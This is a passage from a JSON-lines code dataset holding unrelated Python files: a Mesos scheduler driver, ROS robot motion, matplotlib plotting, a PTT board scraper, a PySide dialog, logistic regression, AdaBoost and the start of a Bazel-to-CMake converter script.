ignore_if_aborted\n\n\nclass PesosSchedulerDriver(SchedulerDriver):\n def __init__(self, scheduler, framework, master_uri, credential=None, context=None):\n self.context = context or Context.singleton()\n self.scheduler = scheduler\n self.scheduler_process = None\n self.master_uri = master_uri\n self.framework = framework\n self.lock = threading.Condition()\n self.status = mesos.DRIVER_NOT_STARTED\n self.detector = None\n self.credential = credential\n\n def locked(method):\n @functools.wraps(method)\n def _wrapper(self, *args, **kw):\n with self.lock:\n return method(self, *args, **kw)\n return _wrapper\n\n def _initialize_detector(self):\n if self.master_uri.startswith(\"zk:\"):\n raise Exception(\"The zookeeper master detector is not supported\")\n\n return StandaloneMasterDetector(self.master_uri)\n\n @locked\n def start(self):\n if self.status is not mesos.DRIVER_NOT_STARTED:\n return self.status\n\n if self.detector is None:\n self.detector = self._initialize_detector()\n\n assert self.scheduler_process is None\n self.scheduler_process = SchedulerProcess(\n self,\n self.scheduler,\n self.framework,\n self.credential,\n self.detector,\n )\n self.context.spawn(self.scheduler_process)\n self.status = mesos.DRIVER_RUNNING\n return self.status\n\n @locked\n def stop(self, failover=False):\n if self.status not in (mesos.DRIVER_RUNNING, mesos.DRIVER_ABORTED):\n return self.status\n\n if self.scheduler_process is not None:\n self.context.dispatch(self.scheduler_process.pid, 'stop', failover)\n\n aborted = self.status == mesos.DRIVER_ABORTED\n self.status = mesos.DRIVER_STOPPED\n self.lock.notify()\n return mesos.DRIVER_ABORTED if aborted else self.status\n\n @locked\n def abort(self):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n\n assert self.scheduler_process is not None\n self.scheduler_process.aborted.set()\n self.context.dispatch(self.scheduler_process.pid, 'abort')\n self.status = mesos.DRIVER_ABORTED\n self.lock.notify()\n return self.status\n\n @locked\n def join(self):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n\n while self.status is mesos.DRIVER_RUNNING:\n self.lock.wait() # Wait until the driver notifies us to break\n\n log.info(\"Scheduler driver finished with status 
%d\", self.status)\n assert self.status in (mesos.DRIVER_ABORTED, mesos.DRIVER_STOPPED)\n return self.status\n\n @locked\n def run(self):\n self.status = self.start()\n return self.status if self.status is not mesos.DRIVER_RUNNING else self.join()\n\n @locked\n def requestResources(self, requests):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'request_resources', requests)\n return self.status\n\n @locked\n def launchTasks(self, offer_ids, tasks, filters=None):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'launch_tasks', offer_ids, tasks, filters)\n return self.status\n\n @locked\n def killTask(self, task_id):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'kill_task', task_id)\n return self.status\n\n @locked\n def declineOffer(self, offer_id, filters=None):\n return self.launch_tasks(offer_id, [], filters)\n\n @locked\n def reviveOffers(self):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'revive_offers')\n return self.status\n\n @locked\n def sendFrameworkMessage(self, executor_id, slave_id, data):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(\n self.scheduler_process.pid,\n 'send_framework_message',\n executor_id,\n slave_id,\n data,\n )\n return self.status\n\n @locked\n def reconcileTasks(self, statuses):\n if self.status is not mesos.DRIVER_RUNNING:\n return self.status\n assert self.scheduler_process is not None\n self.context.dispatch(self.scheduler_process.pid, 'reconcile_tasks', statuses)\n return self.status\n\n # idiomatic snake_case aliases.\n request_resources = requestResources\n launch_tasks = launchTasks\n kill_task = killTask\n decline_offer = declineOffer\n revive_offers = reviveOffers\n send_framework_message = sendFrameworkMessage\n reconcile_tasks = reconcileTasks\n","sub_path":"pesos/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":15877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"608830533","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport xlrd\n\ndata = xlrd.open_workbook('excelfile.xlsx')\ntable1 = data.sheets()[0]\nl1=table1.row_values(0)\njf=set()\n# canvas=\n# def dealit(li):\n\n\t# draw rectangle from li[2] li[3]\n#draw a line\ndef drawRectangle(x = 0.0, y = 0.0, width = 10.0, height = 10.0, color = \"black\"):\n turtle.penup()\n turtle.goto(x + width / 2.0, y + height / 2.0)\n turtle.color(color)\n turtle.pendown()\n for i in range(0, 2):\n turtle.right(90)\n turtle.forward(height)\n turtle.right(90)\n turtle.forward(width)\n turtle.penup()","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"253559943","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nPI = 3.1415926535897\n\ndef rotate():\n\n #Starts a new node\n rospy.init_node('vel_club', anonymous=True)\n velocity_publisher = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n vel_msg 
= Twist()\n    vel = 0.2\n\n    # Set the circle parameters (the radius is hard-coded rather than read from the user)\n    print(\"Let's make a circle\")\n    Radius = 0.2\n\n    \n    vel_msg.linear.x= vel\n    vel_msg.linear.y=0\n    vel_msg.linear.z=0\n    vel_msg.angular.x = 0\n    vel_msg.angular.y = 0\n\n    t0 = float(rospy.Time.now().to_sec())\n    current_distance = 0\n\n    \n    while(current_distance < Radius):\n        \n        velocity_publisher.publish(vel_msg)\n        \n        t1=float(rospy.Time.now().to_sec())\n        \n        current_distance= (vel)*(t1-t0)\n        \n    vel_msg.linear.x = 0\n    \n    velocity_publisher.publish(vel_msg)\n\n    angular_speed = abs(90*2*PI/360)\n    vel_msg.angular.z = angular_speed\n\n    t00 = rospy.Time.now().to_sec()\n    current_angle = 0\n    relative_angle = 90*2*PI/360\n\n    while(current_angle < relative_angle):\n        velocity_publisher.publish(vel_msg)\n        t11 = rospy.Time.now().to_sec()\n        current_angle = angular_speed*(t11-t00)\n\n\n    vel_msg.angular.z = 0\n    velocity_publisher.publish(vel_msg)\n    \n    # drive the circle until shutdown; the original while (k < dist) loop never\n    # incremented k and so looped forever anyway, this makes that intent explicit\n    while not rospy.is_shutdown():\n        vel_msg.linear.x= vel\n        vel_msg.angular.z = (vel)/(Radius)\n        velocity_publisher.publish(vel_msg)\n    \n    rospy.spin()\n\nif __name__ == '__main__':\n    try:\n        # Testing our function\n        rotate()\n    except rospy.ROSInterruptException:\n        pass\n","sub_path":"catkin_ws/src/assignment_3/src/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"324213111","text":"import matplotlib.pyplot as plt\nimport os\nimport csv\nimport numpy as np\n\nfiles = os.listdir('data/')\nparams = []\ntime_values = []\neuler_values = []\nquaternion_values = []\n\nfor file in files:\n    with open('data/'+file, encoding='utf-8-sig') as csvfile:\n        readCSV = csv.reader(csvfile, delimiter=',')\n        times = []\n        euler_angles = []\n        quaternion_angles = []\n\n        params.append(file.split('.csv')[0].split('-'))\n        \n        for row in readCSV:\n            times.append(int(row[0]))\n            euler_angles.append(float(row[1]))\n            quaternion_angles.append(float(row[2]))\n\n        times[:] = [val - times[0] for val in times]\n        euler_angles[:] = [val - euler_angles[0] for val in euler_angles]\n        quaternion_angles[:] = [val - quaternion_angles[0] for val in quaternion_angles]\n        \n        time_values.append(times)\n        euler_values.append(euler_angles)\n        quaternion_values.append(quaternion_angles)\n        \nfor i in range(len(params)):\n    plt.figure()\n    plt.grid()\n    plt.xlim(0, time_values[i][-1])\n    plt.plot(time_values[i], euler_values[i], label='Euler Angle')\n    plt.plot(time_values[i], quaternion_values[i], label = 'Quaternion Angle')\n    plt.legend()\n    plt.xlabel('Time (ms)')\n    plt.ylabel('Deviation (degrees)')\n    title_string = 'Base Gain: ' + params[i][0] + ' Low Threshold: ' + params[i][1] + ' High Threshold: ' + params[i][2] + r\" $\\varepsilon$: \" + params[i][3]\n    plt.title(title_string)\n    plt.savefig('plots/'+files[i].split('.csv')[0]+'.png')\n    \n","sub_path":"Tests/generate_graphs.py","file_name":"generate_graphs.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"461630795","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = 'https://www.ptt.cc/bbs/NBA/index.html'\r\n\r\npttDomain = 'https://www.ptt.cc'\r\nlastPage = ''\r\ncategory = ''\r\n\r\n# connection check\r\ndef connectionCheck(html):\r\n    if html.status_code != requests.codes.ok:\r\n        return False\r\n    else:\r\n        return True\r\n\r\n# fetch the page data and print matching posts\r\ndef getPageData(url):\r\n    html = requests.get(url)\r\n    \r\n    
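# parse only after the HTTP status check passes; note requests.get() is called without a timeout here\r\n    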
if connectionCheck(html):\r\n        soup = BeautifulSoup(html.content , 'html.parser')\r\n        # the paging buttons in PTT's top-right block\r\n        menuDiv = soup.find('div' , class_='btn-group btn-group-paging')\r\n\r\n        lastLinks = menuDiv.find_all('a')\r\n        # grab the URL of the previous page ('上頁' is PTT's literal label for it)\r\n        for lastLink in lastLinks:\r\n            if '上頁' in lastLink.string:\r\n                global lastPage\r\n                lastPage = lastLink.get('href')\r\n        \r\n        content = soup.find('div' , class_='r-list-container action-bar-margin bbs-screen')\r\n        \r\n        # separator between the pinned board rules and the posts on the newest-articles page\r\n        r_list_sep = content.find('div' , class_='r-list-sep')\r\n        \r\n        if r_list_sep is None:\r\n            r_ent_div = content.find_all('div' , class_ = 'r-ent')\r\n        else:\r\n            r_ent_div = r_list_sep.find_previous_siblings('div' , class_ ='r-ent' )\r\n\r\n        i = 0\r\n        for item in r_ent_div:\r\n            title = item.find('div' , class_='title')\r\n            if title.find('a'):\r\n                s = title.find('a')\r\n                titleText = s.string\r\n                a = s.get('href')\r\n                date = item.find('div' , class_='date').string\r\n\r\n                global category\r\n                if category in titleText :\r\n                    i = i+1\r\n                    print('#{} Title:{} Date:{} \\n #Link:https://www.ptt.cc{}' . format(i , titleText , date , a))\r\n        return \r\n        \r\n    else:\r\n        print('Unable to connect to the site')\r\n        return\r\n\r\n\r\nwhile True:\r\n    try:\r\n        page = int(input('Enter the number of pages to search: '))\r\n        break\r\n    except:\r\n        print('Please enter a number!')\r\n    \r\nsearchRange = range(1 , page +1)\r\ncategory = '['+input('Enter the category to search for: ')+']'\r\n\r\nfor num in searchRange:\r\n    if num == 1:\r\n        getPageData(url)\r\n    else:\r\n        url = pttDomain + lastPage\r\n        getPageData(url)\r\n\r\n\r\n","sub_path":"KUO_LUN/write/30 python/Beautiful Soup/B_soup_ptt_multi_page.py","file_name":"B_soup_ptt_multi_page.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"101394725","text":"# coding: UTF-8\r\nimport sys\r\nimport pyqtgraph as pg\r\nfrom PySide import QtCore, QtGui\r\nimport numpy as np\r\nimport re\r\nfrom configobj import ConfigObj\r\n\r\nclass AboutWidget(QtGui.QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper(AboutWidget,self).__init__(None,\r\n\t\t# QtCore.Qt.WindowStaysOnTopHint)\r\n\t\t\t)\r\n\t\tself.setupGUI()\r\n\tdef setupGUI(self):\r\n\t\tself.setWindowTitle(\"About GeoTravis\")\r\n\t\tself.setWindowIcon(QtGui.QIcon('images/Logo.png'))\r\n\t\t# self.setGeometry(500, 300, 350, 200)\r\n\t\tself.layout = QtGui.QHBoxLayout()\r\n\t\tself.setLayout(self.layout)\r\n\t\tself.image = QtGui.QPixmap()\r\n\t\tself.image.load('./images/Logo.png')\r\n\t\tself.image = self.image.scaled(200, 200, \r\n\t\t\tQtCore.Qt.KeepAspectRatio) \r\n\t\t# self.image.scaled(100, 200, QtCore.Qt.IgnoreAspectRatio) \r\n\t\tself.imgLabel = QtGui.QLabel(self)\r\n\t\t# self.imgLabel.setScaledContents(True)\r\n\t\tself.imgLabel.resize(110,102)\r\n\t\tself.imgLabel.setPixmap(self.image)\r\n\t\tself.textLabel = QtGui.QLabel(self)\r\n\t\tself.textLabel.setText('GeoTravis is awesome!!!\\n'*15)\r\n\t\tself.layout.addWidget(self.imgLabel)\r\n\t\tself.layout.addWidget(self.textLabel)\r\n\r\nif __name__ == '__main__':\r\n\tApp = QtGui.QApplication(sys.argv)\r\n\tw = AboutWidget()\r\n\tw.setWindowIcon(QtGui.QIcon('../images/Logo.png'))\r\n\t# w.image.load('../images/Logo.png')\r\n\t# w.imgLabel.setPixmap(w.image)\r\n\tw.show()\r\n\tApp.exec_()","sub_path":"lib/AboutWidget.py","file_name":"AboutWidget.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"590387523","text":"def mergeArrays(arr1, arr2, n1, n2):\n    arr3 = [None] * (n1+n2)\n    i = 0\n    j = 0\n    k = 0\n\n    
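# two-pointer merge: repeatedly copy the smaller head element; using <= below\n    # keeps the merge stable when both arrays hold equal values\n    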
while i < n1 and j < n2:\n        if arr1[i] <= arr2[j]:\n            arr3[k] = arr1[i]\n            i = i + 1\n            k = k + 1\n        else:\n            # the else branch also covers equal elements, which the original pair of\n            # strict comparisons skipped, hanging the loop (and the loop bound above\n            # is fixed from j < n1 to j < n2)\n            arr3[k] = arr2[j]\n            j = j + 1\n            k = k + 1\n\n    while i < n1:\n        arr3[k] = arr1[i]\n        i = i + 1\n        k = k + 1\n\n    while j < n2:\n        arr3[k] = arr2[j]\n        j = j + 1\n        k = k + 1 \n    print(\"Array after merging\") \n    for i in range(n1 + n2): \n        print(str(arr3[i]), end = \" \") \n\narr1 = [0, 3, 4, 31] \nn1 = len(arr1) \n \narr2 = [4, 6, 30] \nn2 = len(arr2) \nmergeArrays(arr1, arr2, n1, n2)\n","sub_path":"src/Training_codes/MergeSortedArrays.py","file_name":"MergeSortedArrays.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"23940164","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\npath='./ex2data2.txt'\ndata=pd.read_csv(path,header=None,names=['t1','t2','ac'])\n# print(data.head())\n\npositive=data[data['ac'].isin([1])]\nnegative=data[data['ac'].isin([0])]\n\n\nplt.scatter(positive['t1'],positive['t2'],s=50,c='b',marker='o')\nplt.scatter(negative['t1'],negative['t2'],s=50,c='r',marker='x')\nplt.legend(['positive','negative']) # legend: positive, negative\nplt.xlabel('t1')\nplt.ylabel('t2')\n# plt.show()\n\ndegree=5\nx1=data['t1']\nx2=data['t2']\ndata.insert(3,'ones',1)\nfor i in range(1,degree):\n    for j in range(0,i):\n        data['F'+str(i)+str(j)]=np.power(x1,i-j)*np.power(x2,j) # create a set of polynomial features\ndata.drop('t1',axis=1,inplace=True) # drop the t1 and t2 columns in place\ndata.drop('t2',axis=1,inplace=True)\n# print(data.head())\n\ndef sigmoid(x):\n    return 1/(1+np.exp(-x))\n\ndef costReg(theta,X,y,alpha):\n    theta=np.matrix(theta)\n    X=np.matrix(X)\n    y=np.matrix(y)\n    first=np.multiply(-y,np.log(sigmoid(X*theta.T)))\n    second=np.multiply((1-y),np.log(1-sigmoid(X*theta.T)))\n    reg=alpha*(theta*theta.T-theta[0,0]*theta[0,0])/len(X)/2 # reg is the regularization term (theta0 is not regularized)\n    # reg = (alpha / (2 * len(X))) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n    return (np.sum(first-second)/len(X)+reg).getA()[0][0] # len(X) is the number of training examples\n\n\ndef gradientReg(theta,X,y,alpha):\n    theta=np.matrix(theta)\n    X=np.matrix(X)\n    y=np.matrix(y)\n    parameters=theta.shape[1] # number of columns of theta\n    grad=np.zeros(parameters) # a 1-D array\n\n    error=sigmoid(X*theta.T)-y\n\n    for j in range(parameters):\n        term=np.multiply(error,X[:,j])\n        if(j==0):\n            grad[j]=np.sum(term)/len(X)\n        else:\n            grad[j]=np.sum(term)/len(X)+alpha/len(X)*theta[:,j]\n    return grad\n\ndef gradientReg_without_loop(theta,X,y,alpha,lambd=1):\n    theta = np.matrix(theta)\n    X = np.matrix(X)\n    y = np.matrix(y)\n    error = sigmoid(X * theta.T) - y\n    grad=(alpha*X.T*error/len(X)).T+alpha*lambd/len(X)*theta\n    # theta0 is not regularized\n    grad[0,0]=np.sum(np.multiply(error,X[:,0]))/len(X)\n    # or grad[0,0]=np.sum(error)/len(X), since X[:,0] is all ones\n    return np.array(grad).ravel()\n\ncols=data.shape[1]\nx=data.iloc[:,1:cols]\ny=data.iloc[:,0:1]\nX=np.matrix(x.values)\ny=np.matrix(y.values)\ntheta=np.zeros(11)\n\n\nalpha=1\nprint(costReg(theta,X,y,alpha))\nprint(gradientReg(theta,X,y,alpha))\n\nimport scipy.optimize as opt\nresult=opt.fmin_tnc(func=costReg,x0=theta,fprime=gradientReg_without_loop,args=(X,y,alpha))\n# result=opt.fmin_tnc(func=costReg,x0=theta,fprime=gradientReg,args=(X,y,alpha))\nprint(result)","sub_path":"ex2/ex2_2/ex2_2.py","file_name":"ex2_2.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"164647370","text":"# -*- encoding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n
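# AdaBoost in brief: repeatedly fit a decision stump on re-weighted data; stump t\n# gets a vote alpha_t = 0.5 * ln((1 - eps_t) / eps_t), and the final prediction is\n# sign(sum_t alpha_t * h_t(x)). See adaBoostTrainDS() and adaClassify() below.\n\n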
def loadSimpData():\n    dataMat = np.matrix([[1., 2.1], [2., 1.1], [1.3, 1.], [1., 1.], [2., 1.]])\n    classLabels = [1.0, 1.0, -1.0, -1.0, 1.0]\n    return dataMat, classLabels\n\ndef stumpClassify(dataMatrix, dimen, threshVal, threshIneq):\n    retArray = np.ones((np.shape(dataMatrix)[0], 1))\n    if threshIneq == 'lt':\n        retArray[dataMatrix[:, dimen] <= threshVal] = -1.0\n    else:\n        # 'gt' flips the inequality: predict -1 above the threshold\n        # (assigning 1.0 here was a no-op, since retArray is initialized to ones)\n        retArray[dataMatrix[:, dimen] > threshVal] = -1.0\n    return retArray\n\n'''\nBuild the best decision stump (one-level decision tree) for the weights D\n'''\ndef buildStump(dataArr, classLabels, D):\n    dataMatrix = np.mat(dataArr)\n    labelMatrix = np.mat(classLabels).T\n    m, n = np.shape(dataMatrix) #(5, 2)\n    numSteps = 10.0\n    # stores the best stump found for the given weight vector D\n    bestStump = {}\n    bestClasEst = np.mat(np.zeros((m, 1)))\n    minError = np.inf\n    # iterate over every feature of the dataset\n    for i in range(n):\n        rangeMin = dataMatrix[:, i].min()\n        rangeMax = dataMatrix[:, i].max()\n        # compute the step size from the min and max values\n        stepSize = (rangeMax - rangeMin) / numSteps\n        for j in range(-1, int(numSteps) + 1):\n            for inequal in ['lt', 'gt']:\n                # set the threshold\n                threshVal = rangeMin + float(j) * stepSize\n                # predict classes from the dataset, feature and threshold\n                predictedVals = stumpClassify(dataMatrix, i, threshVal, inequal)\n                # build a column vector whose entries are 1 wherever predictedVals disagrees with the true labels in labelMatrix\n                errArr = np.mat(np.ones((m, 1)))\n                errArr[predictedVals == labelMatrix] = 0\n                # multiply errArr element-wise with the weight vector D and sum, giving weightedError\n                weightedError = D.T * errArr\n                ##print('split: dim %d, thresh %.2f, thresh inequal: %s, the weighted error is %.3f' %(i, threshVal, inequal, weightedError))\n                # if the current weighted error beats the minimum so far, remember this stump in the dict bestStump\n                if weightedError < minError:\n                    minError = weightedError\n                    bestClasEst = predictedVals.copy()\n                    bestStump['dim'] = i\n                    bestStump['thresh'] = threshVal\n                    bestStump['ineq'] = inequal\n    return bestStump, minError, bestClasEst\n    \ndataArr, classLabels = loadSimpData()\nD = np.mat(np.ones((5, 1)) / 5)\nbestStump, minError, bestClasEst = buildStump(dataArr, classLabels, D)\n##print(bestStump)\n##print(minError)\n##print(bestClasEst)\n\ndef adaBoostTrainDS(dataArr, classLabels, numIt=40):\n    weakClassArr = []\n    m = np.shape(dataArr)[0]\n    # D holds one weight per data point, initialized uniformly\n    D = np.mat(np.ones((m, 1)) / m)\n    # running sum of the class estimates for every data point\n    aggClassEst = np.mat(np.zeros((m, 1)))\n    for i in range(numIt):\n        # use buildStump() to find the stump with the lowest weighted error under D;\n        # it also returns that minimal error and the estimated class vector\n        bestStump, error, classEst = buildStump(dataArr, classLabels, D)\n        ##print('D: ', D.T)\n        ##print('error: ', error)\n        # weight of this stump's vote in the ensemble: alpha = 0.5 * log((1.0-error) / error)\n        alpha = float(0.5 * np.log((1.0 - error) / max(error, 1e-16)))\n        bestStump['alpha'] = alpha\n        # append the best stump to the array of weak classifiers\n        weakClassArr.append(bestStump)\n        ##print('classEst: ', classEst.T)\n        expon = np.multiply(-1 * alpha * np.mat(classLabels).T, classEst)\n        # each iteration AdaBoost raises the weights of misclassified points while lowering\n        # those of correctly classified ones; D is a probability distribution summing to 1.0\n        D = np.multiply(D, np.exp(expon))\n        D = D / D.sum()\n        # aggClassEst keeps the running aggregate class estimate\n        aggClassEst += alpha * classEst\n        ##print('aggClassEst: ', aggClassEst.T)\n        aggErrors = np.multiply(np.sign(aggClassEst) != np.mat(classLabels).T, np.ones((m, 1)))\n        errorRate = aggErrors.sum() / m\n        print('total error: ', errorRate)\n        if errorRate == 0.0:\n            break\n    return weakClassArr, aggClassEst\n\ndataArr, classLabels = loadSimpData()\nclassifierArray = adaBoostTrainDS(dataArr, classLabels, 9)\n##print(classifierArray)\n'''\n[{'dim': 0, 'thresh': 1.3, 'ineq': 'lt', 'alpha': 0.6931471805599453}, \n {'dim': 1, 'thresh': 1.0, 'ineq': 'lt', 'alpha': 0.9729550745276565}, \n{'dim': 0, 'thresh': 0.9, 'ineq': 'lt', 'alpha': 0.8958797346140273}]\n'''\n\n'''\nClassify with the trained ensemble of weak classifiers\n'''\ndef adaClassify(datToClass, classifierArr):\n    
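# weighted vote: every stump's prediction is scaled by its alpha and accumulated;\n    # the sign of the running total is the ensemble's class label\n    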
dataMatrix = np.mat(datToClass)\n    m = np.shape(dataMatrix)[0]\n    aggClassEst = np.mat(np.zeros((m, 1)))\n    for i in range(len(classifierArr)):\n        classEst = stumpClassify(dataMatrix, classifierArr[i]['dim'], classifierArr[i]['thresh'], classifierArr[i]['ineq'])\n        # each weak classifier's output is weighted by its alpha; the weighted sum is the final score\n        aggClassEst += classifierArr[i]['alpha'] * classEst\n        ##print('aggClassEst: ', aggClassEst)\n    # return the sign of aggClassEst: +1 if it is positive, -1 if it is negative\n    return np.sign(aggClassEst)\n\n##dataArr, labelArr = loadSimpData()\n##classifierArray = adaBoostTrainDS(dataArr, labelArr, 30)\n##print(classifierArray)\n##print('ada classify1: ', adaClassify([0, 0], classifierArray))\n##print('ada classify2: ', adaClassify([[5, 5], [0, 0]], classifierArray))\n\ndef loadDataSet(fileName):\n    numFeat = len(open(fileName).readline().split('\\t'))\n    dataMatrix = []\n    labelMatrix = []\n    fr = open(fileName)\n    for line in fr.readlines():\n        lineArr = []\n        curLine = line.strip().split('\\t')\n        for i in range(numFeat - 1):\n            lineArr.append(float(curLine[i]))\n        dataMatrix.append(lineArr)\n        labelMatrix.append(float(curLine[-1]))\n    return dataMatrix, labelMatrix\n\ndataArr, labelArr = loadDataSet('horseColicTraining.txt')\nclassifierArray, aggClassEst = adaBoostTrainDS(dataArr, labelArr, 10)\n\ntestArr, testLabelArr = loadDataSet('horseColicTest.txt')\nprediction10 = adaClassify(testArr, classifierArray)\nerrArr = np.mat(np.ones((len(prediction10), 1)))\nnumErr = errArr[prediction10 != np.mat(testLabelArr).T].sum()\nnumRate = float(numErr) / len(prediction10)\nprint('misclassified count: %d, error rate: %.2f' %(numErr, numRate))\n\n'''\nPlot the ROC curve and compute the AUC\n'''\ndef plotROC(predStrengths, classLabels):\n    # current cursor position\n    currPoint = (1.0, 1.0)\n    ySum = 0.0\n    # number of positive examples\n    numPositiveClass = sum(np.array(classLabels) == 1.0)\n    # step sizes along the x and y axes\n    yStep = 1 / float(numPositiveClass)\n    xStep = 1 / float(len(classLabels) - numPositiveClass)\n    # indices of the prediction strengths, sorted in ascending order\n    sortedIndicies = predStrengths.argsort()\n    fig = plt.figure()\n    fig.clf()\n    ax = plt.subplot(111)\n    for index in sortedIndicies.tolist()[0]:\n        # each time we hit a positive (1.0) label, step down along the y axis, lowering the true positive rate\n        if classLabels[index] == 1.0:\n            delX = 0\n            delY = yStep\n        # for every other label, step back along the x axis (false positive direction)\n        else:\n            delX = xStep\n            delY = 0\n            # accumulate rectangle heights only on x-axis moves; adding on every step\n            # (as the original did) inflates the AUC\n            ySum += currPoint[1]\n        ax.plot([currPoint[0], currPoint[0] - delX], [currPoint[1], currPoint[1] - delY], c='b')\n        currPoint = (currPoint[0] - delX, currPoint[1] - delY)\n    ax.plot([0, 1], [0, 1], 'b--')\n    plt.xlabel('False Positive Rate')\n    plt.ylabel('True Positive Rate')\n    plt.title('ROC curve for AdaBoost Horse Colic Detection System')\n    ax.axis([0, 1, 0, 1])\n    plt.show()\n    print('Area Under Curve(AUC): %.3f' %(ySum * xStep))\n    \ndataArr, labelArr = loadDataSet('horseColicTraining.txt')\nclassifierArray, aggClassEst = adaBoostTrainDS(dataArr, labelArr, 10)\nplotROC(aggClassEst.T, labelArr)","sub_path":"02.机器学习实战/07.AdaBoost元算法/codes/adaboost.py","file_name":"adaboost.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"521213230","text":"from collections import Counter\n\nf = open('Assignment_text.txt', 'r')\n\ntop_5 = {}\nfor line in f:\n    # find() returns -1 when absent; the original '> 0' test missed \"coffee\" at the start of a line\n    if line.find(\"coffee\") != -1:\n        bag_list = [v for v in line.split(\",\")[1:-1] if v and v != 'coffee']\n\n        for item in bag_list:\n            if top_5.get(item) is None:\n                top_5[item] = 1\n            else:\n                top_5[item] += 1\n\ncnt = 
Counter(top_5)\nprint(cnt.most_common(n=5))\n\nf.close()\n","sub_path":"python-study/Assignment_naver_kin_1.py","file_name":"Assignment_naver_kin_1.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"275186173","text":"#!/usr/bin/env python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"This script assists with converting from Bazel BUILD files to CMakeLists.txt.\n\nBazel BUILD files should, where possible, be written to use simple features\nthat can be directly evaluated and avoid more advanced features like\nvariables, list comprehensions, etc.\n\nGenerated CMake files will be similar in structure to their source BUILD\nfiles by using the functions in build_tools/cmake/ that imitate corresponding\nBazel rules (e.g. cc_library -> iree_cc_library.cmake).\n\nFor usage, see:\n python3 build_tools/bazel_to_cmake/bazel_to_cmake.py --help\n\"\"\"\n# pylint: disable=missing-docstring\n\nimport argparse\nimport datetime\nimport os\nimport re\nimport sys\n\nimport bazel_to_cmake_converter\n\nrepo_root = None\n\nEDIT_BLOCKING_PATTERN = re.compile(\n r\"bazel[\\s_]*to[\\s_]*cmake[\\s_]*:?[\\s_]*do[\\s_]*not[\\s_]*edit\",\n flags=re.IGNORECASE)\n\n\ndef parse_arguments():\n global repo_root\n\n parser = argparse.ArgumentParser(\n description=\"Bazel to CMake conversion helper.\")\n parser.add_argument(\"--preview\",\n help=\"Prints results instead of writing files\",\n action=\"store_true\",\n default=False)\n parser.add_argument(\n \"--allow_partial_conversion\",\n help=\"Generates partial files, ignoring errors during conversion\",\n action=\"store_true\",\n default=False)\n\n # Specify only one of these (defaults to --root_dir=iree).\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"--dir\",\n help=\"Converts the BUILD file in the given directory\",\n default=None)\n group.add_argument(\n \"--root_dir\",\n help=\"Converts all BUILD files under a root directory (defaults to iree/)\",\n default=\"iree\")\n\n args = parser.parse_args()\n\n # --dir takes precedence over --root_dir.\n # They are mutually exclusive, but the default value is still set.\n if args.dir:\n args.root_dir = None\n\n return args\n\n\ndef setup_environment():\n \"\"\"Sets up some environment globals.\"\"\"\n global repo_root\n\n # Determine the repository root (two dir-levels up).\n repo_root = os.path.dirname(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n\ndef log(*args, **kwargs):\n print(*args, **kwargs, file=sys.stderr)\n\n\ndef convert_directory_tree(root_directory_path, write_files,\n allow_partial_conversion):\n log(f\"convert_directory_tree: {root_directory_path}\")\n for root, _, _ in os.walk(root_directory_path):\n convert_directory(root, write_files, allow_partial_conversion)\n\n\ndef convert_directory(directory_path, write_files, allow_partial_conversion):\n if not os.path.isdir(directory_path):\n raise FileNotFoundError(f\"Cannot find 
